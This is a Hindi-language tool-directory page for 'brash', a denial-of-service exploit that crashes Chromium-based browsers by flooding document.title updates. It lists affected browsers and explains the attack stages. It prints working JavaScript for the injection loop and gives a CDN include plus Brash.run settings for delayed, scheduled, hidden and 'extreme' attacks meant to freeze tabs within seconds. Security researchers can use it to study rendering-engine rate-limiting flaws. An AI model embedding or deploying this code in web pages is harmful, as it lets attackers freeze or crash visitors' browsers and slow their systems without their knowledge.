Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
brash — Chromium ब्राउज़र DoS हमला document.title शोषण के माध्यम से | Kitploit
उपकरण/GitHubGitHub/jofpin/brash
शोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubjofpin/brash

brash

Chromium ब्राउज़र DoS हमला document.title शोषण के माध्यम से

रिपॉजिटरी देखें
18061511 महीने पहलेKitploit द्वारा समीक्षित
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Brash

Brash by Jose Pino

Chromium ब्राउज़र DoS आक्रमण document.title शोषण द्वारा

Brash Blink में एक गंभीर कमजोरी है, जो Google के Chromium-आधारित ब्राउज़रों को शक्ति प्रदान करने वाला रेंडरिंग इंजन है। यह किसी भी Chromium ब्राउज़र को 15-60 सेकंड में ढहा सकता है, जो कुछ DOM संचालनों के प्रबंधन में एक आर्किटेक्चरल दोष का शोषण करता है।

आक्रमण वेक्टर document.title API अपडेट पर दर सीमा के पूर्ण अभाव से उत्पन्न होता है। यह प्रति सेकंड लाखों DOM म्यूटेशन इंजेक्ट करने की अनुमति देता है, और इस इंजेक्शन प्रयास के दौरान, यह मुख्य थ्रेड को संतृप्त करता है, ईवेंट लूप को बाधित करता है और इंटरफ़ेस को ढहने का कारण बनता है। प्रभाव महत्वपूर्ण है, यह उच्च CPU संसाधनों की खपत करता है, समग्र सिस्टम प्रदर्शन को ख़राब करता है, और एक साथ चल रही अन्य प्रक्रियाओं को रोक या धीमा कर सकता है। डेस्कटॉप, Android और एम्बेडेड वातावरणों पर Chromium ब्राउज़रों को प्रभावित करके, यह कमजोरी इंटरनेट पर 3 बिलियन से अधिक लोगों को सिस्टम-स्तरीय सेवा अस्वीकार के लिए उजागर करती है।

स्थिति: संचालन में
प्रभावित संस्करण: Chromium ≤ 143.0.7483.0 (परीक्षित: 138.0.7204.251, 141.0.7390.108, 143.0.7483.0)

[!ध्यान दें] शोषण वर्तमान में संचालन में है। एक बार जब कमजोरी को पैच कर दिया जाता है, तो यह कोड काम करना बंद कर देगा। फिर भी, इस आर्किटेक्चरल दोष की खोज करना और संपूर्ण शोध, दस्तावेज़ीकरण और डिज़ाइन प्रक्रिया को पूरा करके दुनिया के साथ कुछ प्रभावशाली साझा करना एक अविश्वसनीय रूप से पुरस्कृत यात्रा रही है।

परीक्षण

macOS, Windows और Linux पर 11 प्रमुख ब्राउज़रों का परीक्षण किया गया ताकि कमजोरी के प्रभाव को मान्य किया जा सके।

कमजोर (Chromium/Blink)

सभी Chromium-आधारित ब्राउज़र कमजोर हैं क्योंकि दोष Blink रेंडरिंग इंजन के मूल में मौजूद है:

  • Chrome — 15-30 सेकंड में क्रैश
  • Edge — 15-25 सेकंड में क्रैश
  • Vivaldi — 15-30 सेकंड में क्रैश
  • Arc Browser — 15-30 सेकंड में क्रैश
  • Dia Browser — 15-30 सेकंड में क्रैश
  • Opera — ~60 सेकंड में क्रैश
  • Perplexity Comet — 15-35 सेकंड में क्रैश
  • ChatGPT Atlas — 15-60 सेकंड में क्रैश
  • Brave — 30-125 सेकंड में क्रैश

कमजोर नहीं (अन्य इंजनों का उपयोग करने वाले)

  • Firefox (Gecko इंजन) — आक्रमण के प्रति प्रतिरक्षित
  • Safari (WebKit इंजन) — आक्रमण के प्रति प्रतिरक्षित
  • iOS ब्राउज़र (सभी WebKit का उपयोग करते हैं) — Apple की अनिवार्य नीति के कारण आक्रमण के प्रति प्रतिरक्षित, जिसमें सभी iOS ब्राउज़रों को अपने रेंडरिंग इंजन के रूप में WebKit का उपयोग करना आवश्यक है, जिससे iOS पर Chromium-आधारित ब्राउज़र असंभव हो जाते हैं

यह कैसे काम करता है

Brash Blink रेंडरिंग इंजन में एक मूलभूत आर्किटेक्चरल दोष का शोषण करता है: document.title अपडेट पर थ्रॉटलिंग का अभाव। आक्रमण तीन महत्वपूर्ण चरणों में संचालित होता है:

1. हैश उत्पादन (तैयारी)

आक्रमण शुरू करने से पहले 512 वर्णों के 100 अद्वितीय हेक्साडेसिमल स्ट्रिंग उत्पन्न करता है और उन्हें मेमोरी में संग्रहीत करता है।

उन्हें रीयल-टाइम में उत्पन्न करने के बजाय पहले से लोड क्यों करें?

क्योंकि लगातार नए स्ट्रिंग उत्पन्न करने से गणितीय संक्रियाओं पर CPU समय खर्च होता है। वह समय महत्वपूर्ण है—स्ट्रिंग उत्पन्न करने में बिताया गया प्रत्येक मिलीसेकंड वह समय नहीं है जो ब्राउज़र को document.title अपडेट से बमबारी करने में उपयोग किया गया है।

मेमोरी में पहले से 100 स्ट्रिंग लोड होने से:

  • तेज़ आक्रमण: स्ट्रिंग उत्पन्न करने के लिए कोई रुकावट नहीं
  • केंद्रित CPU: ब्राउज़र को संतृप्त करने के लिए 100% संसाधन समर्पित
  • कम सिस्टम रुकावट: कचरा संग्रहकर्ता को लगातार सक्रिय होने से रोकता है
  • पता लगाने से बचता है: 100 अलग-अलग स्ट्रिंग ब्राउज़र को अपडेट को कैश या अनुकूलित करने से रोकते हैं

परिणामस्वरूप, हम प्रति अपडेट अधिकतम मेमोरी खपत के साथ अधिकतम इंजेक्शन गति प्राप्त करते हैं।

// उच्च-एंट्रॉपी अद्वितीय आईडी उत्पन्न करता है
gid: function() {
    let id = "";
    for (let i = 0x0; i < 0x200; i++) {
        id += ((Math.random() * 0x10) | 0x0).toString(0x10);
    }
    return id;
}

2. बर्स्ट इंजेक्शन (आक्रमण)

शीर्षक अपडेट के कॉन्फ़िगरेबल बर्स्ट निष्पादित करता है। डिफ़ॉल्ट कॉन्फ़िगरेशन (बर्स्ट: 8000, अंतराल: 1ms) के साथ, यह प्रति सेकंड लगभग 24 मिलियन अपडेट इंजेक्ट करने का प्रयास करता है, और इस प्रयास के दौरान ब्राउज़र का पतन शुरू हो जाता है।

// ट्रिपल-अपडेट पैटर्न: रेंडरिंग पाइपलाइन थ्रैशिंग को अधिकतम करता है
inject: function() {
    const t = this.titles[Math.random() * this.titles.length | 0x0];
    for (let i = 0x0; i < 0x3; i++) {
        document.title = t + i;  // प्रत्येक बर्स्ट 3 अनुक्रमिक अपडेट करता है
    }
    this.counter += 0x3;
}

3. UI थ्रेड संतृप्ति (पतन)

निरंतर अपडेट ब्राउज़र के मुख्य थ्रेड को संतृप्त करते हैं, अन्य ईवेंट के प्रसंस्करण को रोकते हैं:

पतन की समयरेखा:

  • 0-5s: प्रारंभिक UI थ्रेड संतृप्ति, अत्यधिक CPU खपत
  • 5-10s: टैब पूरी तरह से जम गया, बंद करना असंभव
  • 10-15s: ब्राउज़र का पतन या "पृष्ठ अनुत्तरदायी" संवाद
  • 15-60s: बलपूर्वक समाप्ति आवश्यक (Chromium-आधारित ब्राउज़र)

यह क्यों काम करता है?

Blink प्रत्येक document.title परिवर्तन को मुख्य थ्रेड पर बिना दर सीमा के समकालिक रूप से संसाधित करता है। यह एक अड़चन पैदा करता है जो:

  • ईवेंट लूप को ब्लॉक करता है
  • उपयोगकर्ता इनपुट प्रसंस्करण को रोकता है
  • लंबे स्ट्रिंग के साथ मेमोरी को संतृप्त करता है
  • कंपोज़िटर और रेंडरिंग पाइपलाइन को बाधित करता है
  • ब्राउज़र प्रक्रिया थ्रैशिंग का कारण बनता है

डेमो और PoC

Brash के प्रभाव को पूरी तरह से समझने के लिए, आप विभिन्न संदर्भों में शोषण का अनुभव कर सकते हैं, एक नियंत्रित लाइव डेमो से लेकर आपके स्वयं के कार्यान्वयन तक। प्रत्येक विकल्प अलग-अलग स्तर की सहभागिता और तकनीकी समझ के लिए डिज़ाइन किया गया है।

1. लाइव डेमो

Brash को क्रिया में देखने का सबसे तेज़ तरीका। पर जाएँ https://brash.run

ग्राफ़िकल इंटरफ़ेस के बिना शोषण देखने के लिए, https://brash.run/hidden-live-demo.html पर जाएँ। यह संस्करण अदृश्य रूप से इंजेक्शन निष्पादित करता है, एक वास्तविक आक्रमण का अनुकरण करता है।

2. स्थानीय डेमो

यदि आप अपने स्वयं के वातावरण में डेमो चलाना पसंद करते हैं, तो रिपॉजिटरी में शामिल exploit-demo/ निर्देशिका आपको अनुमति देती है:

  • वास्तविक समय में आक्रमण की तीव्रता को समायोजित करने के लिए नियंत्रण
  • प्रति सेकंड अपडेट का दृश्य काउंटर
  • तीन पूर्वनिर्धारित मोड: मध्यम, आक्रामक, और चरम
  • ब्राउज़र के क्रमिक पतन का अवलोकन

बस किसी Chromium ब्राउज़र में exploit-demo/index.html खोलें और शुरू करने से पहले burst और interval मान कॉन्फ़िगर करें।

  • burstSize: प्रति अंतराल शीर्षक परिवर्तन (अधिक = अधिक आक्रामक)
  • interval: बर्स्ट के बीच मिलीसेकंड (कम = अधिक आक्रामक)

3. अपना स्वयं का PoC लागू करें

Brash को अपने स्वयं के सुरक्षा परीक्षण या शोध में एकीकृत करने के लिए, स्क्रिप्ट शामिल करें और आक्रमण कॉन्फ़िगर करें:

स्क्रिप्ट शामिल करें:

<!-- स्थानीय -->
<script src="brash.js"></script>

<!-- CDN -->
<script src="https://cdn.jsdelivr.net/gh/jofpin/brash/brash.js"></script>

API उपयोग:

// 1. तत्काल आक्रमण
Brash.run({
    burstSize: 8000,
    interval: 1
});

// 2. सेकंड में विलंब (डिफ़ॉल्ट)
Brash.run({
    burstSize: 8000,
    interval: 1,
    delay: 30  // 30 सेकंड
});

// 3. स्ट्रिंग के साथ विलंब
Brash.run({
    burstSize: 8000,
    interval: 1,
    delay: "30s"  // या "5000ms" या "3m"
});

// 4. अनुसूचित आक्रमण
Brash.run({
    burstSize: 8000,
    interval: 1,
    scheduled: "2025-10-18T09:30:00"
});

तीव्रता कॉन्फ़िगरेशन:

// मध्यम: नियंत्रित अवलोकन
// प्रभाव: ब्राउज़र धीरे-धीरे प्रतिक्रिया करता है और क्रमिक गिरावट का निरीक्षण करने की अनुमति देता है
Brash.run({ 
    burstSize: 200,
    interval: 1000 // ~600 अपडेट/सेकंड
});

// आक्रामक: तीव्र संतृप्ति
// प्रभाव: टैब 10-20 सेकंड में जम जाते हैं
Brash.run({ 
    burstSize: 2000, 
    interval: 100 // ~60,000 अपडेट/सेकंड
});

// चरम: तत्काल पतन
// प्रभाव: तत्काल फ़्रीज़, 15-30 सेकंड में पूर्ण क्रैश
Brash.run({ 
    burstSize: 8000,
    interval: 1 // ~24M अपडेट/सेकंड का प्रयास (प्रयास के दौरान ब्राउज़र ढह जाता है)
});
टूल डाउनलोड करें